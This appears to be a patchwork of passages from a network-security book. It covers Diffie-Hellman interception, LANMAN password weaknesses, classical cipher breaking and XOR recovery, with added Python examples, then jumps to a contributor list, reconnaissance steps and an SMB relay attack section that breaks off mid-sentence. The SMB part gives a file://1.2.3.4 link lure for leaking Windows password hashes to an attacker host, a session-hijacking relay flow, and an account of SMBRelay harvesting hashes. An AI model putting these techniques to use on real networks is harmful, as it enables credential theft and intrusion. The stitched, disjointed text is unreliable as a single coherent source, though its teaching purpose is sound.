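    return hashlib.sha256(secret.to_bytes(4, "big")).digest()


def unauthenticated_exchange(mitm=False):
    """Al and Charlie exchange public values in the clear.
    Returns (al_key, charlie_key, beth_keys); beth_keys is None when Beth is absent."""
    al_priv, al_pub = dh_keypair()
    ch_priv, ch_pub = dh_keypair()
    if not mitm:
        return dh_shared(al_priv, ch_pub), dh_shared(ch_priv, al_pub), None
    # Beth intercepts both public values and answers each side with her own.
    beth_priv, beth_pub = dh_keypair()
    al_key = dh_shared(al_priv, beth_pub)   # Al believes beth_pub is Charlie's
    ch_key = dh_shared(ch_priv, beth_pub)   # Charlie believes beth_pub is Al's
    beth_keys = (dh_shared(beth_priv, al_pub), dh_shared(beth_priv, ch_pub))
    return al_key, ch_key, beth_keys


# Long-term secret Al and Charlie share out of band (an assumption for the example).
# It stands in for the certificate-based signature an authenticated exchange uses.
LONG_TERM = b"constructed-out-of-band-secret"


def tag_pub(pub, sender):
    """Authenticate a public value; nobody without LONG_TERM can produce this tag."""
    return hmac.new(LONG_TERM, f"{sender}:{pub}".encode(), "sha256").digest()


def tag_ok(pub, sender, tag):
    return hmac.compare_digest(tag_pub(pub, sender), tag)


def authenticated_exchange(mitm=False):
    """Same exchange, each public value carrying its tag. Returns True when both
    sides accept and agree on the key, False when either side rejects the value."""
    al_priv, al_pub = dh_keypair()
    ch_priv, ch_pub = dh_keypair()
    al_msg = (al_pub, tag_pub(al_pub, "al"))
    ch_msg = (ch_pub, tag_pub(ch_pub, "charlie"))
    if mitm:
        _, beth_pub = dh_keypair()
        # Beth can swap in her public value but can only reuse the old tags.
        al_msg = (beth_pub, al_msg[1])
        ch_msg = (beth_pub, ch_msg[1])
    if not (tag_ok(al_msg[0], "al", al_msg[1]) and tag_ok(ch_msg[0], "charlie", ch_msg[1])):
        return False   # substituted value detected; abort before deriving a key
    return dh_shared(al_priv, ch_msg[0]) == dh_shared(ch_priv, al_msg[0])


if __name__ == "__main__":
    k_al, k_ch, _ = unauthenticated_exchange()
    print("no Beth, keys agree:", k_al == k_ch)
    k_al, k_ch, (b_al, b_ch) = unauthenticated_exchange(mitm=True)
    print("Beth present, Al/Charlie agree:", k_al == k_ch,
          "| Beth holds a key with each side:", k_al == b_al and k_ch == b_ch)
    print("authenticated exchange with Beth present accepted:",
          authenticated_exchange(mitm=True))
```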
Hashing Pieces Separately
Older Windows-based clients store passwords in a format known as LanManager
(LANMAN) hashes, which is a horribly insecure authentication scheme.
However, since this chapter is about cryptography, we will limit the discussion of
LANMAN authentication to the broken cryptography used for password storage.
As with UNIX password storage systems, LANMAN passwords are never
stored on a system in cleartext format—they are always stored in a hash format.
The problem is that the hashed format is implemented in such a way that even
though DES is used to encrypt the password, the password can still be broken
with relative ease. Each LANMAN password can contain up to 14 characters, and
all passwords less than 14 characters are padded to bring the total password length
up to 14 characters. During encryption the password is split into a pair of seven-character
passwords, and each of these seven-character passwords is encrypted
with DES. The final password hash consists of the two concatenated DES-encrypted
password halves.
Since DES is known to be a reasonably secure algorithm, why is this implementation
flawed? Shouldn’t DES be uncrackable without significant effort? Not
exactly. Recall that there are roughly 100 different characters that can be used in
a password. Using the maximum possible password length of 14 characters, there
should be about 100^14 or 1.0x10^28 possible password combinations. LANMAN
passwords are further simplified because there is no distinction between upper- and
lowercase letters—all letters appear as uppercase. Furthermore, if the password
is less than eight characters, then the second half of the password hash is
always identical and never even needs to be cracked. If only letters are used (no
numbers or punctuation), then there can only be 26^7 (roughly eight billion) password
combinations. While this may still seem like a large number of passwords to
attack via brute force, remember that these are only theoretical maximums and
that since most user passwords are quite weak, dictionary-based attacks will
uncover them quickly. The bottom line here is that dictionary-based attacks on a
pair of seven-character passwords (or even just one) are much faster than those on
single 14-character passwords.
Suppose that strong passwords that use two or more symbols and numbers are
used with the LANMAN hashing routine. The problem is that most users tend to
just tack on the extra characters at the end of the password. For example, if a user
uses his birthplace along with a string of numbers and symbols, such as “MONTANA45%,”
the password is still insecure. LANMAN will break this password
into the strings “MONTANA” and “45%.” The former will probably be caught
quickly in a dictionary-based attack, and the latter will be discovered quickly in
a brute force attack because it is only three characters. For newer business-oriented
Microsoft operating systems such as Windows NT and Windows 2000,
LANMAN hashing can and should be disabled in the registry if possible, though
this will make it impossible for Win9x clients to authenticate to those machines.
Using a Short Password to Generate a Long Key
Password quality is a subject that we have already briefly touched upon in our
discussion of brute force techniques. With the advent of PKE encryption schemes
such as PGP, most public and private keys are generated using passwords or
passphrases, leaving the password generation steps vulnerable to brute force
attacks. If a password is selected that is not of significant length, that password can
be brute force attacked in an attempt to generate the same keys as the user. Thus
PKE systems such as RSA have a chance to be broken by brute force, not
because of any deficiency in the algorithm itself, but because of deficiencies in
the key generation process. The best way to protect against these types of roundabout
attacks is to use strong passwords when generating any sort of encryption
key. Strong passwords include the use of upper- and lowercase letters, numbers,
and symbols, preferably throughout the password. Eight characters is generally
considered the minimum length for a strong password, but given the severity of
choosing a poor password for key generation, I recommend you use at least
twelve characters for these instances.
High quality passwords are often said to have high entropy, which is a semi-finite
measurement that attempts to quantify the relative quality of a password.
Longer passwords typically have more entropy than shorter passwords, and the
more random each character of the password is, the more entropy in the password.
For example, the password “albatross” (about 30 bits of entropy) might be
reasonably long in length, but has less entropy than a totally random password of
the same length such as “g8%=MQ+p” (about 48 bits of entropy). Since the
former might appear in a list of common names for bird species, while the latter
would never appear in a published list, obviously the latter is a stronger and
therefore more desirable password. The moral of the story here is that strong
encryption such as 168-bit 3-DES can be broken easily if the secret key has only
a few bits of entropy.
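An added example (not code from the book, nor from Crack or L0phtcrack) that ties together three points from this section: Crack-style permutation rules that catch variants such as “pa55word,” the LANMAN seven-plus-seven split that turns “MONTANA45%” into a dictionary word plus a three-character tail, and a rough entropy estimate for the key-generation password. The word list, the substitution rules and the per-character charset model are constructed assumptions, so the bit counts differ from the figures quoted in the text.

```python
import math
import string

# Constructed stand-in for a dictionary file; a real checker loads a large word list.
DICTIONARY = {"password", "secret", "montana", "albatross", "letmein", "welcome"}

# Substitutions people use when they think they are picking a stronger password.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t",
                      "@": "a", "$": "s", "!": "i"})
TRIM = string.digits + string.punctuation   # characters users tack on at either end


def permutations(word):
    """Yield the forms a Crack-style rule set would test for one candidate."""
    base = word.lower()
    yield base
    yield base.translate(LEET)              # pa55word   -> password
    yield base.strip(TRIM)                  # montana45% -> montana
    yield base.strip(TRIM).translate(LEET)  # p@55w0rd!  -> password
    yield base[::-1]                        # drowssap   -> password


def dictionary_hit(word):
    """Return the dictionary word some rule reduces `word` to, or None."""
    for form in permutations(word):
        if form in DICTIONARY:
            return form
    return None


def lanman_halves(password):
    """Split as LANMAN does: uppercase, pad to 14, then two seven-character halves."""
    padded = password.upper().ljust(14, "\0")
    return padded[:7], padded[7:14]


def entropy_bits(password):
    """Random-choice model: log2(charset size) per character (charset model assumed)."""
    size = 0
    if any(c.islower() for c in password): size += 26
    if any(c.isupper() for c in password): size += 26
    if any(c.isdigit() for c in password): size += 10
    if any(c in string.punctuation for c in password): size += len(string.punctuation)
    return len(password) * math.log2(size) if size else 0.0


def audit(password):
    """Return a list of findings; an empty list means the checker saw nothing wrong."""
    findings = []
    hit = dictionary_hit(password)
    if hit:
        findings.append(f"derived from dictionary word '{hit}'")
    if len(password) <= 14:   # LANMAN only handles up to 14 characters (see text)
        first, second = lanman_halves(password)
        if dictionary_hit(first.rstrip("\0")):
            findings.append("LANMAN first half is a dictionary word")
        tail = second.rstrip("\0")
        if not tail:
            findings.append("LANMAN second half is empty, so its hash is a constant")
        elif len(tail) <= 3:
            findings.append(f"LANMAN second half is only {len(tail)} character(s)")
    if not hit and entropy_bits(password) < 48:
        findings.append(f"estimated entropy {entropy_bits(password):.0f} bits")
    return findings


if __name__ == "__main__":
    for candidate in ("MONTANA45%", "pa55word", "secret", "g8%=MQ+p", "Tr4ns-Lux#Vesper9Q"):
        print(f"{candidate!r}: {audit(candidate) or 'no findings'}")
```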
Improperly Stored Private or Secret Keys
Let’s say you have only chosen to use the strong cryptography algorithms, you
have verified that there are not any flaws in the vendors’ implementations, and
you have generated your keys with great care. How secure is your data now? It is
still only as secure as your private or secret key. These keys must be safeguarded at
all costs, or you may as well not even use encryption.
Since keys are simply strings of data, they are usually stored in a file somewhere
in your system’s hard disk. For example, private keys for SSH-1 are stored
in the identity file located in the .ssh directory under a user’s home directory. If
the filesystem permissions on this file allow others to access the file, then this private
key is compromised. Once others have your private or secret key, reading
your encrypted communications becomes trivial. (Note that the SSH identity file
is used for authentication, not encryption; but you get the idea.)
However, in some vendor implementations, your keys could be disclosed to
others because the keys are not stored securely in RAM. As you are aware, any
information processed by a computer, including your secret or private key, is
located in the computer’s RAM at some point. If the operating system’s kernel
does not store these keys in a protected area of its memory, they could conceivably
become available to someone who dumps a copy of the system’s RAM to a
file for analysis. These memory dumps are called core dumps in UNIX, and they
are commonly created during a denial of service (DoS) attack. Thus a successful
hacker could generate a core dump on your system and extract your key from
the memory image. In a similar attack, a DoS attack could cause excess memory
usage on the part of the victim, forcing the key to be swapped to disk as part of
virtual memory. Fortunately, most vendors are aware of this type of exploit by
now, and it is becoming less and less common since encryption keys are now
being stored in protected areas of memory.

Tools & Traps…

Netscape’s Original SSL Implementation

How Not to Choose Random Numbers
As we have tried to point out in this section, sometimes it does not
matter if you are using an algorithm that is known to be secure. If your
algorithm is being applied incorrectly, there will be security holes. An
excellent example of a security hole resulting from misapplied cryptography
is Netscape’s poor choice of random number seeds used in the
Secure Sockets Layer (SSL) encryption of its version 1.1 browser. You no
doubt note that this security flaw is several years old and thus of limited
importance today. However, below the surface we’ll see that this particular
bug is an almost classic example of one of the ways in which vendors
implement broken cryptography, and as such it continues to remain
relevant to this day. We will limit this discussion to the vulnerability in
the UNIX version of Netscape’s SSL implementation as discovered by Ian
Goldberg and David Wagner, although the PC and Macintosh versions
were similarly vulnerable.
Before I can explain the exact nature of this security hole we will
need to cover some background information, such as SSL technology
and random numbers. SSL is a certificate-based authentication and
encryption scheme developed by Netscape during the fledgling days of
e-commerce. It was intended to secure communications such as credit
card transactions from eavesdropping by would-be thieves. Because of
U.S. export restrictions, the stronger and virtually impervious 128-bit
(key) version of the technology was not in widespread use. In fact, even
domestically, most of Netscape’s users were running the anemic 40-bit
international version of the software.
Most key generation, including SSL key generation, requires some
form of randomness as a factor of the key generation process. Arbitrarily
coming up with random numbers is much harder than it sounds, especially
for machines. So we usually end up using pseudo-random numbers
that are devised from mostly random events, such as the time
elapsed between each keystroke you type or the movement of your
mouse across the screen.
For the UNIX version of its version 1.1 browser, Netscape used a
conglomeration of values, such as the current time, the process ID (PID)
number of the Netscape process and its parent’s process ID number.
Suppose the attacker had access to the same machine as the Netscape
user simultaneously, which is the norm in UNIX-based multi-user architectures.
It would be trivial for the attacker to generate a process listing
to discover Netscape’s PID and its parent’s PID. If the attacker had the
ability to capture TCP/IP packets coming into the machine, he could use
the timestamps on these packets to make a reasonable guess as to the
exact time the SSL certificate was generated. Once this information was
gathered, the attacker could narrow down the keyspace to about 10^6
combinations, which is then brute force attacked with ease at near real-time
speeds. Upon successfully discovering Netscape’s SSL certificate
seed generation values, he can generate an identical certificate for himself
and either eavesdrop or hijack the existing session.
Clearly, this was a serious security flaw that Netscape would need
to address in its later versions, and it did, providing patches for the 1.x
series of browsers and developing a new and substantially different
random number generator for its 2.x series of browsers. You can read
more details about this particular security flaw in the archives of Dr.
Dobbs’ Journal at www.ddj.com/documents/s=965/ddj9601h.

Understanding Amateur Cryptography Attempts
If your data is not being protected by one of the more modern, computationally
secure algorithms that we’ve already discussed in this chapter, or some similar
variant, then your data is probably not secure. In this section, we’re going to discover
how simple methods of enciphering data can be broken using rudimentary
cryptanalysis.

Classifying the Ciphertext
Even a poorly encrypted message often looks indecipherable at first glance, but
you can sometimes figure out what the message is by looking beyond just the
stream of printed characters. Often, the same information that you can “read
between the lines” on a cleartext message still exists in an enciphered message.
For the mechanisms discussed below, all the “secrecy” is contained in the
algorithm, not in a separate key. Our challenge for these is to figure out the algorithm
used. So for most of them, that means that we will run a password or some
text through the algorithm, which will often be available to us in the form of a
program or other black box device. By controlling the inputs and examining the
outputs, we hope to determine the algorithm. This will enable us to later take an
arbitrary output and determine what the input was.
NOTE
The techniques described in this section are largely ineffective on modern
algorithms such as DES and its successors. What few techniques do exist
to gain information from modern ciphertext are quite complicated and
only work under special conditions.
Frequency Analysis
The first and most powerful method you can employ to crack simple ciphertext
is frequency analysis, which is based on the idea that certain letters are used more
often than others. For example, I can barely write a single word in this sentence
that doesn’t include the letter e. How can letter frequency be of use? You can
create a letter frequency table for your ciphertext, assuming the message is of sufficient
length, and compare that table to one charting the English language (there
are many available). That would give you some clues about which characters in
the ciphertext might match up with cleartext letters.
The astute reader will discover that some letters appear with almost identical
frequency. How then can you determine which letter is which? You can either
evaluate how the letters appear in context, or you can consult other frequency
tables that note the appearance of multiple letter combinations such as sh, ph, ie
and the.

Crypto of this type is just a little more complicated than the Caesar Cipher
mentioned at the beginning of the chapter. This was state-of-the-art hundreds of
years ago. Now problems of this type are used in daily papers for commuter
entertainment, under the titles of “Cryptogram,” “CryptoQuote,” or similar. Still,
some people will use this method as a token effort to hide things. This type of
mechanism, or ones just slightly more complex, shows up in new worms and
viruses all the time.
Ciphertext Relative Length Analysis
Sometimes the ciphertext can provide you with clues to the cleartext even if you
don’t know how the ciphertext was encrypted. For example, suppose that you
have an unknown algorithm that encrypts passwords such that you have available
the original password and a ciphertext version of that password. If the length or
size of each is the same, then you can infer that the algorithm produces output in
a 1:1 ratio to the input. You may even be able to input individual characters to
obtain the ciphertext translation for each character. If nothing else, you at least
know how many characters to specify for an unknown password if you attempt
to break it using a brute force method.
If you know that the length of a message in ciphertext is identical to the
length of a message in cleartext, you can leverage this information to pick out
pieces of the ciphertext for which you can make guesses about the cleartext. For
example, during WWII while the Allies were trying to break the German Enigma
codes, they used a method similar to the above because they knew the phrase
“Heil Hitler” probably appeared somewhere near the end of each transmission.
Similar Plaintext Analysis
A related method you might use to crack an unknown algorithm is to compare
changes in the ciphertext output with changes in the cleartext input. Of course,
this method requires that you have access to the algorithm to selectively encode
your carefully chosen cleartext. For example, try encoding the strings
“AAAAAA,” “AAAAAB” and “BAAAAA” and note the difference in the ciphertext
output. For monoalphabetic ciphers, you might expect to see the first few
characters remain the same in both outputs for the first two, with only the last
portion changing. If so, then it’s almost trivial to construct a full translation table
for the entire algorithm that maps cleartext input to ciphertext output and vice
versa. Once the translation table is complete, you could write an inverse function
that deciphers the ciphertext back to plaintext without difficulty.

What happens if the cipher is a polyalphabetic cipher, where more than one
character changes in the ciphertext for single character changes in cleartext? Well,
that becomes a bit trickier to decipher, depending on the number of changes to
the ciphertext. You might be able to combine this analysis technique with brute
force to uncover the inner workings of the algorithm, or you might not.
Monoalphabetic Ciphers
A monoalphabetic cipher is any cipher in which each character of the alphabet
is replaced by another character in a one-to-one ratio. Both the Caesar Cipher
and ROT13, mentioned earlier in the chapter, are classic examples of monoalphabetic
ciphers. Some monoalphabetic ciphers scramble the alphabet instead
of shifting the letters, so that instead of having an alphabet of ABCDEFGHIJKLMNOPQRSTUVWXYZ,
the cipher alphabet order might be MLNKBJVHCGXFZDSAPQOWIEURYT.
The new scrambled alphabet is used to
encipher the message such that M=A, L=B…T=Z. Using this method, the
cleartext message “SECRET” becomes “OBNQBW.”
You will rarely find these types of ciphers in use today outside of word games
because they can be easily broken by an exhaustive search of possible alphabet
combinations and they are also quite vulnerable to the language analysis methods
we described. Monoalphabetic ciphers are absolutely vulnerable to frequency
analysis because even though the letters are substituted, the ultimate frequency
appearance of each letter will roughly correspond to the known frequency characteristics
of the language.
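The scrambled alphabet MLNKBJVHCGXFZDSAPQOWIEURYT and the frequency-analysis method described above, carried through in Python as an added example that is not from the book: the cipher itself, a letter-frequency table, and the first-pass guess that pairs the most common ciphertext letters with the most common English letters. The English letter ordering and the sample message are constructed assumptions.

```python
from collections import Counter
import string

PLAIN = string.ascii_uppercase
CIPHER = "MLNKBJVHCGXFZDSAPQOWIEURYT"   # the text's scrambled alphabet: A->M, B->L, ..., Z->T
ENC = str.maketrans(PLAIN, CIPHER)
DEC = str.maketrans(CIPHER, PLAIN)

# English letters from most to least frequent (a commonly published ordering, assumed here).
ENGLISH_ORDER = "ETAOINSHRDLCUMWFGYPBVKJXQZ"


def encipher(cleartext):
    """Substitute each letter through the scrambled alphabet; other characters pass through."""
    return cleartext.upper().translate(ENC)


def decipher(ciphertext):
    """Inverse substitution, for when the full translation table is known."""
    return ciphertext.upper().translate(DEC)


def letter_frequencies(text):
    """Return (letter, count) pairs for the letters in text, most frequent first."""
    return Counter(c for c in text.upper() if c in PLAIN).most_common()


def guess_mapping(ciphertext, top=5):
    """First pass of frequency analysis: pair the `top` most frequent ciphertext
    letters with the most frequent English letters. Near-ties are exactly the
    cases the text says must be settled by context or digraph tables."""
    freq = letter_frequencies(ciphertext)
    return {letter: ENGLISH_ORDER[i] for i, (letter, _) in enumerate(freq[:top])}


def apply_partial(ciphertext, mapping):
    """Render the ciphertext with guessed letters filled in and unknown letters as '.'."""
    return "".join(mapping.get(c, "." if c in PLAIN else c) for c in ciphertext.upper())


# Constructed sample message, long enough for the letter counts to mean something.
SAMPLE = ("the eleven engineers were seen near the seven green trees "
          "where the eagle flew between the steeples every evening")

if __name__ == "__main__":
    print(encipher("SECRET"))                    # OBNQBW, as in the text
    ct = encipher(SAMPLE)
    print(letter_frequencies(ct)[:3])            # B (the image of E) leads by a wide margin
    guess = guess_mapping(ct, top=3)
    print(guess)
    print(apply_partial(ct, guess))              # E is right; the next two need context
```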
Other Ways to Hide Information
Sometimes vendors follow the old “security through obscurity” approach, and
instead of using strong cryptography to prevent unauthorized disclosure of certain
information, they just try to hide the information using a commonly known
reversible algorithm like UUEncode or Base64, or a combination of two simple
methods. In these cases, all you need to do to recover the cleartext is to pass the
ciphertext back through the same engine. Vendors may also use XOR encoding
against a certain key, but you won’t necessarily need the key to decode the message.
Let’s look at some of the most common of these algorithms in use.
XOR
While many of the more complex and secure encryption algorithms use XOR
as an intermediate step, you will often find data obscured by a simple XOR
operation. XOR is short for exclusive or, which identifies a certain type of binary
operation with a truth table as shown in Table 6.2. As each bit from A is combined
with B, the result is “0” only if the bits in A and B are identical. Otherwise,
the result is 1.
Table 6.2 XOR Truth Table

| A | B | A XOR B |
|---|---|---------|
| 0 | 0 | 0       |
| 0 | 1 | 1       |
| 1 | 0 | 1       |
| 1 | 1 | 0       |
Let’s look at a very simple XOR operation and how you can undo it. In our
simple example, we will use a single character key (“a”) to obscure a single character
message (“b”) to form a result that we’ll call “ciphertext” (see Table 6.3).
Table 6.3 XOR of “a” and “b”

| Item       | Binary Value |
|------------|--------------|
| a          | 01100001     |
| b          | 01100010     |
| ciphertext | 00000011     |

Suppose that you don’t know what the value of “a” actually is, you only
know the value of “b” and the resulting “ciphertext.” You want to recover the key
so that you can find out the cleartext value of another encrypted message,
“cipher2,” which is 00011010. You could perform an XOR with “b” and the
“ciphertext” to recover the key “a,” as shown in Table 6.4.

Table 6.4 XOR of “ciphertext” and “b”

| Item       | Binary Value |
|------------|--------------|
| ciphertext | 00000011     |
| b          | 01100010     |
| a          | 01100001     |
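Tables 6.3 and 6.4 carried through in Python as an added example (not code from the book), then generalized to a repeating key recovered from a predictable message prefix; the message and key in the second function are constructed.

```python
def xor_bytes(data, key):
    """XOR data against key, repeating the key when the data is longer."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(known_plaintext, ciphertext, key_len):
    """Known-plaintext recovery: each plaintext byte XOR its ciphertext byte is
    the key byte that covered it, so key_len known bytes reveal the whole key."""
    if min(len(known_plaintext), len(ciphertext)) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext and ciphertext")
    return bytes(p ^ c for p, c in zip(known_plaintext[:key_len], ciphertext[:key_len]))


def book_example():
    """Tables 6.3 and 6.4: recover key 'a' from 'b' and its ciphertext, then apply
    it to cipher2. Returns (recovered_key, cleartext_of_cipher2)."""
    a = 0b01100001              # key, the letter 'a'
    b = 0b01100010              # message, the letter 'b'
    ciphertext = a ^ b          # 0b00000011 (Table 6.3)
    recovered = ciphertext ^ b  # 0b01100001, the key again (Table 6.4)
    cipher2 = 0b00011010
    return recovered, chr(cipher2 ^ recovered)


def demo_repeating_key():
    """Same idea generalized: a longer message under a 4-byte repeating key, with
    the key recovered from a short known prefix. Message and key are constructed."""
    key = b"k3y!"
    message = b"Subject: quarterly numbers attached"
    obscured = xor_bytes(message, key)
    found = recover_key(b"Subject:", obscured, len(key))   # the header is predictable
    return found, xor_bytes(obscured, found)


if __name__ == "__main__":
    key, clear = book_example()
    print(f"key {key:08b} -> cipher2 decodes to {clear!r}")
    found, plain = demo_repeating_key()
    print(f"repeating key {found!r} recovered; message: {plain!r}")
```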

David R. Mirza Ahmad
Ido Dubrawsky
Hal Flynn
Joseph “Kingpin” Grand
Robert Graham
Norris L. Johnson, Jr.
K2
Dan “Effugas” Kaminsky
F. William Lynch
Steve W. Manzuik
Ryan Permeh
Ken Pfeil
Rain Forest Puppy
Ryan Russell, Technical Editor

# Information Gathering

Many companies only concentrate on protecting their systems from a
specific exploit when they start building a security infrastructure. They
figure out what patches need to be applied to their systems, and after
they apply them, they think they are secure. However, they do not realize
that through reconnaissance and information gathering, an attacker can
acquire a large amount of information about their sites.

Before an attacker can run an exploit, he needs to understand the environment he is going after. In doing so, he needs to gather preliminary information about the number of machines, type of machines, operating systems, and so forth. If someone was going to rob a bank, they would not just wake up one day and randomly pick a target. They would scope out the possible targets and gather information about how the bank works, where the guards stand, when they change shifts, possible weaknesses that can be exploited, and based on that information, they would decide not only which target to attack, but how to attack it. No matter what the target is, before an attacker goes after it, he has to gather as much information as possible, so his chances of success are very high. In most cases, whether an attack is successful or not is directly related to how much information was gathered about the target. As you will see, if an attacker performs the information gathering stage correctly and in enough detail, access is almost guaranteed.

Therefore, it is key for a company to know what information an attacker can acquire about it and minimize the potential damage. When I perform security assessments, I perform information gathering against a company to try to find out its points of vulnerability. In doing so, I acquire a lot of useful information about the site. In some cases, I take the information and produce a network map of the company, and in several cases, the end result was a better map than the company's IT department had. The question I pose is this: After an attacker has a detailed map of your network and knows exactly what software and versions are running on each machine, how hard is it for him to successfully exploit your network? The answer is simple. After someone has that much information, the network is as good as compromised. Therefore, it is key that an attacker only gains limited information about a network.

Steps for Gathering Information :)

The following are the seven basic steps an attacker would take to gather
information about a target. After each step are some of the tools an
attacker would use to gain the information he needs to exploit the target:

1. Find out initial information:
   - Open Source
   - Whois
   - Nslookup
2. Find out address range of the network:
   - ARIN (American Registry for Internet Numbers)
   - Traceroute
3. Find active machines:
   - ping
4. Find open ports or access points:
   - Portscanners:
     - Nmap
     - ScanPort
   - War Dialers:
     - THC-Scan
5. Figure out the operating systems:
   - Queso
   - nmap
6. Figure out which services are running on each port:
   - Default port and OS
   - Telnet
   - Vulnerability scanners
7. Map out the network:
   - Traceroute
   - Visual ping
   - Cheops

We will take a look at each of the seven steps and examine how each of the tools works. Not only will we see how they can be used by an attacker to compromise a system, but we will show you how to use them to protect your system. Most people have a negative view towards tools that can be used to compromise systems because they fail to realize the benefit of using these tools. If you understand and use these tools on a regular basis, they can be used to increase the security of your site. Also, if you use them to increase your security and protect your site, then the value of these tools to an attacker decreases. The thing to learn from this chapter is that these tools should be embraced. The more you know and understand about how an attacker breaks into a network, the better you can increase the security at your site. After we cover all the steps and tools, we will finish the chapter with an example of red teaming, which shows how you can simulate an attack to determine and fix your vulnerabilities before a real attacker exploits them.

ERIC COLE

# The SMB Man-In-The-Middle Attack


Because Windows automatically tries to log in as the current user if no other authentication information is explicitly supplied, if an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. L0pht Crack's FAQ mentions this as a way to retrieve password hashes from remote networks for cracking. There are a number of ways to force a Windows machine to establish a NetBIOS connection; their FAQ recommends sending an email with a link to file://1.2.3.4/share/whatever.html so that if the user clicks on it, it connects to 1.2.3.4's NetBIOS server as the currently logged in user, transmitting the hashed password information.

It is actually very easy to force a NetBIOS connection, simply have any web browser or IE API
(WinInet) based app view html that includes an image with a source URL like file://1.2.3.4/share/
whatever.gif or use NBNAME /RESPOND to return the attacker's IP address in response to name
queries, find a remotely accessible service (such as ftp server or http server) that doesn't properly
parse or check user supplied paths or filenames and supply it with a filename like \\1.2.3.4\share
\whatever.gif, and I'm sure there are many other ways yet to be discovered/revealed.

Man in the middle attacks are an old concept. However, when a target host can be forced to authenticate with an attacker and the credentials used are also valid on the server portion of the target, it becomes possible to gain access to that server as whatever user the target's client is trying to authenticate as. This is accomplished by acting as a man in the middle to both the server and the client portions of the target. This same method could be used to gain access to any server the authentication information issued by the target client is valid on (for instance, any other server in the same domain). After the authentication has been completed, the target's client is disconnected and the attacker remains connected to the target's server as whatever user the target is logged in as, hijacking the connection.

SMB uses a challenge-response method of authentication to prevent replay attacks and complicate
cracking. The challenge is 8 bytes of randomly generated data which the client encrypts using the
password as an encryption key. The negotiation flow is usually like this:

```text
Client->Server   Session request, workstation service requests connection to server service.
Server->Client   Session response, yes that NetBIOS name is connectable here.
Client->Server   Negotiation, which dialect do you want to speak with me?
Server->Client   Dialect selection, let's speak this dialect. Here's the challenge data to encrypt with your password.
Client->Server   Session setup, here's my username and your challenge encrypted with the password hash I want to logon as.
Server->Client   Session setup response, yes ok you are connected as that user.
```

To gain access to a server once a NetBIOS connection has been received from a target client, the flow
would be:

```text
Target client->Attacker   Session request, workstation service requests connection to some server name.
Attacker->Target server   Session request, some workstation requests connection to server service.
Target server->Attacker   Session response, yes you can connect to that name.
Attacker->Target client   Session response, yes you can connect to that name.
Target client->Attacker   Negotiation, which dialect do you want to talk?
Attacker->Target server   Negotiation, would you like to talk to me as if I'm an NT 4 box without extended security?
Target server->Attacker   Dialect selection, ok let's talk that way, here's my challenge.
Attacker->Target client   Dialect selection, let's speak this way, here's a challenge.
Target client->Attacker   Session setup, here's my username and password encrypted with your challenge.
Attacker->Target server   Session setup, here's the username and encrypted password I want to logon as.
Target server->Attacker   Session setup response, ok you are connected now.
Attacker->Target client   *snip*
Attacker->Target server   (Attacker does whatever the target client user can do)
```
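The challenge-response logon and the relay flow just described, as an added toy model that is not cDc's SMBRelay code: `Server`, `Client`, `relay_logon` and the constructed sample account are mine, and SHA-256/HMAC stand in for the real LM/NT hash and DES challenge encryption. It also adds the check the page does not discuss, a simplified model of SMB signing: when every post-logon request must carry a MAC under a session key derived from the password hash, the relayed logon still completes but the relay, which never sees the hash, cannot get a single command accepted.

```python
import hashlib, hmac, os

def password_hash(password: str) -> bytes:
    """Stand-in for the stored LM/NT hash (SHA-256 here, constructed for this model)."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()

def challenge_response(pw_hash: bytes, challenge: bytes) -> bytes:
    """'Your challenge encrypted with the password hash' from the session setup."""
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()

def session_key(pw_hash: bytes, response: bytes) -> bytes:
    """Signing key derived from the hash: the real client and the server can compute it, a relay cannot."""
    return hmac.new(pw_hash, response, hashlib.sha256).digest()

def sign(key: bytes, command: bytes) -> bytes:
    return hmac.new(key, command, hashlib.sha256).digest()

class Server:
    def __init__(self, users: dict, require_signing: bool):  # users: name -> password hash
        self.users, self.require_signing, self.challenge, self.key = users, require_signing, None, None

    def negotiate(self) -> bytes:  # Server->Client: dialect selection, "here's the challenge data"
        self.challenge = os.urandom(8)
        return self.challenge

    def session_setup(self, user: str, response: bytes) -> bool:  # Client->Server: username + response
        pw_hash = self.users.get(user)
        if pw_hash is None or self.challenge is None or not hmac.compare_digest(
                challenge_response(pw_hash, self.challenge), response):
            return False
        self.key = session_key(pw_hash, response)
        return True

    def execute(self, command: bytes, signature: bytes) -> bool:
        """A post-logon request; when signing is required it must carry a MAC under the session key."""
        return self.key is not None and (not self.require_signing or hmac.compare_digest(sign(self.key, command), signature))

class Client:
    def __init__(self, user: str, password: str):
        self.user, self.pw_hash = user, password_hash(password)

    def session_setup(self, challenge: bytes) -> tuple:  # Client->Server: username + encrypted challenge
        return self.user, challenge_response(self.pw_hash, challenge)

def honest_logon(client: Client, server: Server, command: bytes) -> bool:
    user, response = client.session_setup(server.negotiate())
    signature = sign(session_key(client.pw_hash, response), command)
    return server.session_setup(user, response) and server.execute(command, signature)

def relay_logon(client: Client, server: Server, command: bytes) -> tuple:
    """The target server's challenge is handed to the target client as if it were the attacker's own, and the
    client's reply is passed on to the server.  Returns (logged on, relayed command accepted)."""
    challenge = server.negotiate()                    # Attacker->Target server: negotiation
    user, response = client.session_setup(challenge)  # Attacker->Target client: "here's a challenge"
    logged_on = server.session_setup(user, response)  # Attacker->Target server: session setup
    return logged_on, logged_on and server.execute(command, sign(b"attacker-guess", command))

# Constructed sample account for trying the model (not from the page)
USERS = {"administrator": password_hash("example-password")}
BOB = Client("administrator", "example-password")
```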

Once connected, a target can verify the relayed connection using:

net session

SMBRelay

Smbrelay is a program that receives a connection on port 139, connects back to the connecting
computer's port 139 or to another target server, and relays the packets between the client and server of
the connecting Windows machine, making modifications to these packets when necessary.

After connecting and authenticating it disconnects the target client and binds to port 139 on a new IP address. This IP address (the relay address) can then be connected to directly from Windows using `net use \\192.1.1.1` and then used by all of the networking built into Windows. It relays all the SMB traffic, except for the negotiation and authentication. You can disconnect from and reconnect to this virtual IP as long as the target host stays connected.

SMBRelay is multi-threaded and handles multiple connections simultaneously. It will create new IP addresses sequentially, removing them when the target host disconnects. It will not allow the same IP address to connect twice, unless a successful connection to that target was achieved and disconnected. If this happens, it may use the same relay address again for another connection.

SMBRelay collects the NTLM password hashes transmitted and writes them to hashes.txt in a format
